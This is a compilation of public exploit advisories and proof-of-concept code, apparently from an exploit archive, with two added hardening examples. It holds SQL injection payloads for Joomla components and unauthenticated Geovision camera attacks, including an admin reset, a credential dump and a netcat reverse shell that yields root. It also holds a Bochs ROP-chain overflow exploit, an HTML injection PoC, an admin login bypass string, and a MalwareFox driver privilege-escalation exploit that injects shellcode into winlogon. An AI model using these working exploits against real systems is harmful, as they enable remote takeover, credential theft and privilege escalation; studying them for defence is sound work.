# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
#
# 4)
#
# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
# <input type="text" name="jform[guestemail]"...
# <input type="text" name="jform[ticketid]"...
# <input type="submit" name="searchsubmit"...
# </form>
#
# # # # #
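The two parameter shapes abused across the Zh GoogleMap/BaiduMap/YandexMap and JSP Tickets advisories above (a numeric `id` spliced into a UNION-able query, and a quoted string `ticketcode`) modelled on an in-memory SQLite database, with the raw-splice handler beside the hardened one that casts `id` to an integer and binds `ticketcode` as a query parameter. This is an added example, not code from the advisories or from the Joomla components; the table and column names are constructed.

```python
import sqlite3


def make_db():
    """Constructed sample schema standing in for the component tables (assumption)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE placemarks (id INTEGER, title TEXT);
        CREATE TABLE tickets (ticketcode TEXT, subject TEXT);
        INSERT INTO placemarks VALUES (1, 'Office');
        INSERT INTO tickets VALUES ('5a71d319e86c1', 'Printer broken');
    """)
    return con


def placemark_details_vulnerable(con, raw_id):
    # Raw splice: an 'id' of '-11 UNION ALL SELECT ...' becomes part of the statement,
    # so the UNION branch can read any table the database user can see.
    return con.execute(f"SELECT id, title FROM placemarks WHERE id = {raw_id}").fetchall()


def placemark_details_hardened(con, raw_id):
    # Integer parameter: anything that is not an integer is rejected before it reaches SQL
    # (int() raises ValueError), and the value is bound rather than spliced.
    safe_id = int(raw_id)
    return con.execute("SELECT id, title FROM placemarks WHERE id = ?", (safe_id,)).fetchall()


def ticket_edit_vulnerable(con, raw_code):
    # Quoted splice: a single quote in the value closes the literal and the rest is SQL.
    sql = f"SELECT ticketcode, subject FROM tickets WHERE ticketcode = '{raw_code}'"
    return con.execute(sql).fetchall()


def ticket_edit_hardened(con, raw_code):
    # Bound parameter: quotes inside the value stay data, never syntax.
    return con.execute("SELECT ticketcode, subject FROM tickets WHERE ticketcode = ?",
                       (raw_code,)).fetchall()
```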
Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days
Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/
heap: Executable + Non-ASLR
stack: Executable + ASLR
Vulnerable:
Practically all models and versions of Geovision embedded IP devices with FW before November/December 2017 suffer from one or more of these vulnerabilities.
Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19
Timeline:
November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'
November 8, 2017: Response from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
(due to the easy exploiting and number of vulnerabilities in large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, together with thanks for the effort in trying to make Geovision products safer.
January 17, 2018: Thanked Geovision for good cooperation.
February 1, 2018: Full disclosure
-[Unauthorized Access]-
1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN
2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply
3)
Unauthorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm
4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "[...]"
/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
Nov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]
5)
Unauthorized access to 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET)
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"
6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/System/reboot/description
PoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
Full recursive list: /PSIA/indexr
-[Remote Command Execution]-
7)
PoC will create 'tmp/Login.htm' containing '<!--#include file="SYS_CFG"-->', then Dump All Settings,
including logins and passwords in clear text, by accessing the created Login.htm
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"
< HTTP/1.1 200 OK
...
-------------------------------------
- -
- Dump All Settings -
- -
-------------------------------------
...
8)
PoC will pop reverse connect back shell to 192.168.57.1
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55331.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
9)
/www/JpegStream.cgi
curl -v "http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55332.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
Problem(s):
SIiUTIL_GetDecryptData calls popen() with "sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;..." without properly sanitizing user input
Note:
Vulnerable tags: 'username', 'password' and 'key'
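The following is an added example, not Geovision's code: it shows the popen() pattern behind findings 7-9 next to a launcher that cannot be hijacked the same way. Only the helper path /var/www/testbf and the "d <key>" argument shape come from the popen() string quoted above; the function names, the allow-list and the use of /bin/echo as a stand-in helper in the demo are assumptions for illustration.

```c
/*
 * Added example, not Geovision's code: the popen() pattern behind findings
 * 7-9 next to a launcher that cannot be hijacked the same way. Only the
 * helper path /var/www/testbf and the "d <key>" argument shape come from
 * the advisory; function names and the allow-list are illustrative.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define HELPER "/var/www/testbf"

/* Vulnerable: the string popen() hands to "sh -c". With a key such as
 * "PWNED ;mkfifo /tmp/s0" the ';' ends the helper command and the rest
 * runs as a second shell command. Returns 1 if the command fit in out. */
int build_cmd_vulnerable(char *out, size_t n, const char *key)
{
    int len = snprintf(out, n, "%s d %s", HELPER, key);
    return len >= 0 && (size_t)len < n;
}

/* Hardening step 1: allow-list the value before it is used anywhere.
 * 1..64 characters from [A-Za-z0-9_-]; no shell metacharacter can pass. */
int key_is_safe(const char *key)
{
    size_t len = strlen(key);
    if (len == 0 || len > 64)
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = key[i];
        if (!((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardening step 2: no shell at all. The helper is exec'd with a fixed
 * argv, so a key full of ';' and '|' is one literal argument. The child's
 * stdout is captured into out (NUL-terminated); returns bytes captured or
 * -1 on error. */
ssize_t run_helper_noshell(const char *helper, const char *key, char *out, size_t n)
{
    int fds[2];
    if (n == 0 || pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        char *const argv[] = { (char *)helper, "d", (char *)key, NULL };
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execv(helper, argv);            /* no "sh -c" anywhere in this path */
        _exit(127);
    }
    close(fds[1]);
    size_t got = 0;
    ssize_t r;
    while (got + 1 < n && (r = read(fds[0], out + got, n - 1 - got)) > 0)
        got += (size_t)r;
    close(fds[0]);
    out[got] = '\0';
    waitpid(pid, NULL, 0);
    return (ssize_t)got;
}

/* Demo wrappers with static result buffers. */
const char *demo_vulnerable_cmd(const char *key)
{
    static char cmd[256];
    build_cmd_vulnerable(cmd, sizeof cmd, key);
    return cmd;
}

const char *demo_noshell_output(const char *helper, const char *key)
{
    static char captured[256];
    if (run_helper_noshell(helper, key, captured, sizeof captured) < 0)
        captured[0] = '\0';
    return captured;
}

int main(void)
{
    const char *evil = "PWNED ;mkfifo /tmp/s0";
    printf("sh -c \"%s\"   <- what popen() runs\n", demo_vulnerable_cmd(evil));
    printf("key_is_safe(evil) = %d\n", key_is_safe(evil));
    /* /bin/echo stands in for /var/www/testbf so the demo runs anywhere */
    printf("execv() helper saw: %s", demo_noshell_output("/bin/echo", evil));
    return 0;
}
```

The two hardening steps are independent: the allow-list stops the value at the CGI boundary, and the fork/execv launcher means that even a value that slips past validation is never interpreted by a shell. Either alone would have broken findings 7-9; a firmware fix should do both.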
-[Double free]-
10)
curl -v http://192.168.57.20:80/PSIA/System/configurationData
*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***
-[Stack Overflow]-
11)
/usr/local/thttpd
curl -v "http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en "X";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x0003889c in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x0 0
r1 0x369650 3577424
r2 0x1 1
r3 0x68 104
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0x3680e8 3571944
sp 0x7ee0fbc8 0x7ee0fbc8
lr 0x3889c 231580
pc 0x49494948 0x49494948
cpsr 0x20000030 536870960
(gdb)
12)
/usr/local/thttpd
curl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en "X"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x3e4c4d54 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0xffffffff 4294967295
r1 0x7e963e8c 2123775628
r2 0x0 0
r3 0x242 578
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0xa 10
sp 0x7e983c48 0x7e983c48
lr 0x3e4c4d54 1045187924
pc 0x49494948 0x49494948
cpsr 0x60000030 1610612784
(gdb)
13)
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en "A";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
14)
/www/Login3gpp.cgi
curl -v "http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---
15)
/www/Login.cgi
curl -v "http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
Note: 'username' and 'password' are both copied with strcpy() and both overflow.
However, 'password' cannot be used remotely since thttpd checks it first; thttpd itself is vulnerable to a stack overflow (see 11 and 12).
Have a nice day
/bashis
[ETX]
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Program description:
# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
# common I/O devices, and a custom BIOS.
#
# Homepage: http://bochs.sourceforge.net/
# Version: 2.6-5
# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb
import os, subprocess
from struct import pack
# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
#
# Program received signal SIGSEGV, Segmentation fault.
#
# [----------------------------------registers-----------------------------------]
# EAX: 0x1
# EBX: 0x41414141 ('AAAA')
# ECX: 0x8167fa0 (<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov edx,DWORD PTR [esp+0x8])
# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90 (<_ZN13bx_real_sim_cD2Ev>: repz ret)
# ESI: 0x41414141 ('AAAA')
# EDI: 0x41414141 ('AAAA')
# EBP: 0x41414141 ('AAAA')
# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# EIP: 0x41424344 ('DCBA')
# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41424344
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
# 0008| 0xbfffedc8 --> 0x0
# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# 0016| 0xbfffedd0 --> 0x2
# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
# 0024| 0xbfffedd8 --> 0x0
# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41424344 in ?? ()
# Padding goes here
junk = 'A'*1200
ropchain = pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276424) # @ .data + 4
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08054cc4) # pop ebx ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x08235733) # pop ecx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x082350b5) # pop edx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804f101) # int 0x80
crafted_buff = junk + ropchain
try:
    print("[*] BOCHS 2.6-5 Buffer Overflow - Exploit by Juan Sacco")
    print("[*] Running, wait for the shell")
    subprocess.call(["bochs-bin", crafted_buff])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print("[*] Sorry! BOCHS not found!")
    else:
        print("[*] Error executing exploit")
        raise
# Exploit Title: Netis-WF2419 HTML Injection
# Date: 20/01/2018
# Exploit Author: Sajibe Kanti
# Author Contact :https://twitter.com/@sajibekantibd
# Vendor Homepage: http://www.netis-systems.com/
# Version: Netis-WF2419 , V3.2.41381
# Tested on: Windows 10
# CVE : CVE-2018-6190
HTML Injection in Netis-WF2419
Netis-WF2419 is prone to an HTML-injection vulnerability because it fails
to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or script code could run in the context of the
affected site, potentially allowing the attacker to steal cookie-based
authentication credentials and control how the site is rendered to the
user; other attacks are also possible.
Proof of Concept:
1. Go to your wireless router IP (ex. 192.168.0.1)
2. Go to the Wireless Settings tab
3. Click the MAC Filtering tab
4. Enter a MAC address and, in Description, write (<h1>XSS-PWD</h1>)
5. Click Add
6. The injected HTML is now rendered
#Solution:
Upgrade Firmware
# Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass
# Dork: "Powered by: i-Net Solution"
# Date: 2018-02-06
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
# Version: 2.0.6
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit, an attacker can bypass the admin panel authentication: the password value closes the quoted string in the login query and appends a tautology (SQL injection).
# # # # #
# Proof of Concept:
# username : anything
# password : admin' or 'a'='a
# admin panel login : /admin_login.php
/*
Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date: 03/02/2018
Author: Souhail Hammou
Vendor Homepage: https://www.malwarefox.com/
Version: 2.74.0.150
Tested on: Windows 7 32-bit / Windows 10 64-bit
CVE: CVE-2018-6606
*/
#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
BOOL RegisterProcessByIOCTL(HANDLE hDevice)
{
DWORD pid, BytesReturned;
/*
IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
processes can send special IOCTLs to the driver to do stuff like:
- Enable/Disable real-time protection
- Write to raw disk
- Open full access handles to processes
- ...etc
When a process sends a special IOCTL, the driver checks if that process is registered (as
shown in the disassembly below at address 0000000140010573).
However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
doesn't check to see if the requestor itself is registered (0000000140010553).
That way, any process can register any other process (including itself) with the driver.
.text:000000014001054A mov ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
.text:000000014001054D cmp ebx, 80002010h
.text:0000000140010553 jz short find_ioctl_dispatcher ;jump past the check
[......]
.text:0000000140010573 mov edx, 1
.text:0000000140010578 mov ecx, ebp ; Requestor_PID
.text:000000014001057A call IsProcessRegistered
.text:000000014001057F lea rdx, aMain_c
.text:0000000140010586 test eax, eax
.text:0000000140010588 jnz short loc_1400105C2
.text:000000014001058A mov [rsp+68h+var_38], ebp
.text:000000014001058E lea rax, aProcessidDIsNo
.text:0000000140010595 mov edi, STATUS_ACCESS_DENIED
[......]
.text:00000001400105C8 find_ioctl_dispatcher: ; CODE XREF: sub_1400104BC+97j
.text:00000001400105C8 ; sub_1400104BC+ACj
[......]
.text:0000000140010612 cmp ebx, 80002010h
.text:0000000140010618 jz loc_1400106D7 ; dispatch the IOCTL
*/
pid = GetCurrentProcessId(); //Register our process with the driver
if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
{
return FALSE;
}
return TRUE;
}
DWORD GetWinlogonPID()
{
DWORD WinlogonPid = 0;
PROCESSENTRY32 ProcessEntry;
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
printf("[-] CreateToolhelp32Snapshot failed !\n");
goto ret;
}
if (!Process32First(hSnapshot, &ProcessEntry))
{
printf("[-] Process32First failed !\n");
goto cleanup;
}
do
{
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
{
WinlogonPid = ProcessEntry.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &ProcessEntry));
cleanup:
CloseHandle(hSnapshot);
ret:
return WinlogonPid;
}
int main(int argc, char** argv)
{
DWORD BytesReturned;
DWORD winlogon_pid;
HANDLE winlogon_handle;
LPVOID RemoteAllocation;
HANDLE hDevice;
printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
printf(" Tested on Windows 10 64-bit \n");
printf(" Souhail Hammou \n\n");
printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");
hDevice = CreateFile
("\\\\.\\ZemanaAntiMalware",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
return 0;
}
if (!RegisterProcessByIOCTL(hDevice))
{
printf("\t[-] Registration Failed !\n");
return 0;
}
printf("\t[+] Process registered.\n[*] Stage 2: \n");
printf("\t[+] Getting Winlogon's PID\n");
winlogon_pid = GetWinlogonPID();
if (!winlogon_pid)
{
printf("\t[-] GetWinlogonPID() failed !\n");
return 0;
}
printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
/*
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
We use this IOCTL to open a full access handle to winlogon.exe.
Note that this IOCTL can only be sent if the process is registered with the driver.
*/
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
return 0;
}
printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{
printf("\t[-] VirtualAllocEx failed !\n");
return 0;
}
printf("\t[+] Writing shellcode to allocated memory\n");
/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
{
printf("\t[-] WriteProcessMemory Failed !\n");
return 0;
}
printf("\t[+] Spawning SYSTEM shell\n");
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
{
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
return 0;
}
}
